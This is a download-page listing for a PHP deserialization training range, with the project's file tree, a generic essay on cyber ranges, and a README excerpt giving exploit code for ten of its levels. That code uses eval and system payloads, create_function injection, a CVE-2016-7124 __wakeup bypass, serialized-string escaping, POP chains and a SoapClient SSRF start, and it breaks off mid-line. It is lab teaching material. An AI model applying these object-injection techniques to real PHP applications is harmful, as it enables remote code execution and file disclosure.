php反序列化靶场，集合了常见的php反序列化漏洞——由这周末在做梦制作.zip

共43个文件

php：31个

png：11个

md：1个

网络攻防

网络安全技术

实验环境

需积分: 5 197 浏览量 2024-01-16 17:56:32 上传评论收藏 1.08MB ZIP 举报

靶场，是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中，靶场扮演着重要的角色，尤其是在网络安全领域，靶场成为培养和提高安全专业人员技能的重要平台。首先，靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用，靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作，全面提升其实战能力。其次，靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中，安全专业人员可以模拟攻击者的行为，发现系统和应用的漏洞，并进行渗透测试，从而及时修复和改进防御机制。同时，这也为防御方提供了锻炼机会，通过对抗攻击提高防御能力。靶场的搭建还促进了团队协作与沟通。在攻防对抗中，往往需要多人协同作战，团队成员之间需要密切配合，共同制定攻击和防御策略。这有助于培养团队合作意识，提高协同作战的效率。此外，靶场为学习者提供了一个安全的学习环境。在靶场中，学生可以通过实际操作掌握安全知识，了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观，有助于深化对安全领域的理解。最后，靶场也是安全社区交流的平台。在靶场中，安全从业者可以分享攻防经验，交流最新的安全威胁情报，共同探讨解决方案。这有助于建立更广泛的安全社区，推动整个行业的发展。总体而言，靶场在信息安全领域具有重要地位，为安全专业人员提供了实战演练的机会，促进了团队协作与沟通，为学习者提供了安全的学习环境，同时也是安全社区交流的重要平台。通过靶场的实践操作，安全从业者能够更好地应对不断演变的网络威胁，提高整体的安全水平。

资源推荐

资源详情

资源评论

收起资源包目录

php反序列化靶场，集合了常见的php反序列化漏洞——由这周末在做梦制作.zip （43个子文件）

AJT-code

level14

index.php 322B

flag.php 63B

level4

index.php 456B

flag.php 48B

level7

index.php 507B

flag.php 54B

level13

index.php 372B

hint.php 140B

flag.php 58B

level1

index.php 205B

flag.php 48B

level12

upload.php 1KB

index.php 521B

upload

phar1.png 147B

flag.php 52B

pic

image-20220205105027434.png 64KB

image-20220221092905715.png 19KB

image-20220311065409439.png 128KB

image-20220131204258921.png 61KB

image-20220212192425222.png 31KB

image-20220217103937584.png 702KB

image-20220221100925190.png 22KB

image-20220212192454775.png 19KB

image-20220212192433656.png 31KB

image-20220208202613945.png 40KB

level8

index.php 481B

flag.php 47B

level5

index.php 688B

flag.php 62B

level9

index.php 800B

flag.php 50B

level2

index.php 417B

flag.php 50B

level11

upload.php 1KB

index.php 300B

flag.php 56B

level3

index.php 420B

flag.php 50B

level10

index.php 508B

flag.php 251B

README.md 10KB

level6

index.php 359B

flag.php 54B

# 一，说明在学习反序列漏洞的道路中，最首要的就是掌握类和对象的基础知识，懂得php的基本语法。本项目关卡由易至难，建议广大萌新们全部掌握。小白技术一般，还请广大黑客朋友们见谅~~~ 本着分享学习的目的，本人仅提供exp，并不提供完整的wp，绝对不是太懒的原因~~~ 以下内容或来自提取的CTF考点，或来自个人的理解与整合，均不涉及原题。如有错误，还请见谅~~ # 二，环境 ## 1说明通过PHPstudy，搭建简易wamp环境。 ## 2要求请根据表格内容自行更换及安装php版本和扩展（若无要求，自行斟酌）。不会吧，不会吧，不会真有人配了个php<=5.0版本的然后说环境搭不起来吧。 | 关卡 | 不适用其他版本的原因以及相关设置 | | :------------------------------------- | :----------------------------------------------------------- | | level4 create_fucntion与可变函数调用 | 5.6不支持可变函数，7.2已废除create_function | | level5 序列化格式过滤与CVE-2016-7124 | CVE-2016-7124漏洞影响版本：PHP5 < 5.6.25，PHP7 < 7.0.10 | | level6 私有属性反序列化 | escaped binary string(仅从php6开始支持) | | level7 __call与属性的初始值 | 同上 | | level10 just_one_soap | 需要开启soap扩展(php5.6：extension=php_soap) | | level11 a phar 和 level12 a phar trick | php.ini中phar.readonly=Off（若有分号则去掉） | | level13 引用和session | session.auto_start=0; session.serialize_handler = php;（level13均为默认设置） | | leve14 session.upload_progress | session.auto_start=0; session.serialize_handler = php_serialize; session.upload_progress.enabled = On; session.upload_progress.cleanup = Off; session.upload_progress.prefix = "upload_progress_"; session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"; session.upload_progress.freq = "1%"; session.upload_progress.min_freq = "1"; | # 三，wp **level1 类的实例化** ```php <?php class a{ var $act; function action(){ eval($this->act); } } $a=new a(); $a->act="show_source('flag.php');"; $a->action(); echo serialize($a); ?> ``` **level2 login** ```php <?php highlight_file(__FILE__); class mylogin{ var $user; var $pass; function __construct($user,$pass){ $this->user=$user; $this->pass=$pass; } function login(){ if ($this->user=="daydream" and $this->pass=="ok"){ return 1; } } } $a=new mylogin('daydream','ok'); if($a->login()) { echo 'flag'."\n"; } echo serialize($a); ?> ``` **level3 relogin** ```php echo urlencode(serialize($a)); ``` url编码后，抓包修改发送即可。以下截图为重放攻击。 ![image-20220205105027434](/pic/image-20220205105027434.png) **level4 create_fucntion与可变函数调用** 注意：两个类实例化调用属性的顺序。 ```php <?php highlight_file(__FILE__); class func { public $key; public function __destruct() { unserialize($this->key)(); } } class GetFlag { public $code; public $action; public function get_flag(){ $a=$this->action; $a('', $this->code); } } $a1=new func(); $b=new GetFlag(); $b->code='}include("flag.php");echo $flag;//'; $b->action="create_function"; $a1->key=serialize(array($b,"get_flag")); echo serialize($a1); ?> ``` **level5 序列化格式过滤与CVE-2016-7124** ```php <?php class secret{ var $file='index.php'; public function __construct($file){ $this->file=$file; echo $flag; } function __destruct(){ include_once($this->file); } function __wakeup(){ $this->file='index.php'; } } $pa=new secret('flag.php'); echo serialize($pa),"\n";//O:6:"secret":1:{s:4:"file";s:8:"flag.php";} $cmd=urlencode('O:+6:"secret":2:{s:4:"file";s:8:"flag.php";}'); echo $cmd; ?> ``` **level6 私有属性反序列化** ```php <?php class secret{ private $comm; public function __construct($com){ $this->comm = $com; } function __destruct(){ echo eval($this->comm); } } $pa=new secret("system('type flag.php');"); echo serialize($pa),"\n"; //O:6:"secret":1:{s:12:" secret comm";s:24:"system('type flag.php');";} //O:6:"secret":1:{S:12:"\00secret\00comm";s:24:"system('type flag.php');";} ?> ``` ![image-20220208202613945](/pic/image-20220208202613945.png) **level7 __call与属性的初始值** ```php <?php class you { private $body; private $pro; function __construct(){ $this->body=new my(); $this->pro='yourname'; } function __destruct() { $project=$this->pro; $this->body->$project(); } } class my { public $name='myname'; function __call($func, $args) { if ($func == 'yourname' and $this->name == 'myname') { include('flag.php'); echo $flag; } } } $p=new you(); echo serialize($p); //大写S //O:3:"you":2:{S:9:"\00you\00body";O:2:"my":1:{s:4:"name";s:6:"myname";}S:8:"\00you\00pro";s:8:"yourname";} ?> ``` **level8 反序列化增逃逸** ```php <?php highlight_file(__FILE__); function filter($name){ $safe=array("flag","php"); $name=str_replace($safe,"hack",$name); return $name; } class test{ var $user; var $pass='daydream'; function __construct($user){ $this->user=$user; } } $a=new test('phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}'); //$a=new test('1'); O:4:"test":2:{s:4:"user";s:1:"1";s:4:"pass";s:8:"daydream";} //逃逸内容： //";s:4:"pass";s:8:"escaping";} //计算需要链： //phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";} $param=serialize($a); echo $param,"\n"; $profile=unserialize(filter($param)); echo $profile->pass,"\n"; if ($profile->pass=='escaping'){ echo 1; } ?> ``` ``` O:4:"test":2:{s:4:"user";s:116:"phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";} ``` ![image-20220212192454775](/pic/image-20220212192454775.png) **leve9 ezpop** ```php <?php class Modifier { private $var="flag.php"; public function append($value) { include($value); echo $flag; } public function __invoke(){ $this->append($this->var); } } class Show{ public $source; public $str; public function __toString(){ return $this->str->source; } public function __wakeup(){ echo $this->source; } } class Test{ public $p; public function __construct(){ $this->p = array(); } public function __get($key){ $function = $this->p; return $function(); } } $a=new Modifier(); $b=new Show(); $c=new Test(); $b->source=$b; $b->source->str=$c; $c->p=$a; echo "\n"; echo urlencode(serialize($b)); ``` **level10 just_one_soap** soap数据包测试方法：将loaction更改为监听ip和端口即可（注意：该包是index.php”发出“的）。下图实例（公网ip测试）：![image-20220217103937584](/pic/image-20220217103937584.png) ```php <?php $post_data='pass=password'; $data_len=strlen($post_data); $a = new SoapClient(null,array('location'=>'http

评论收藏

内容反馈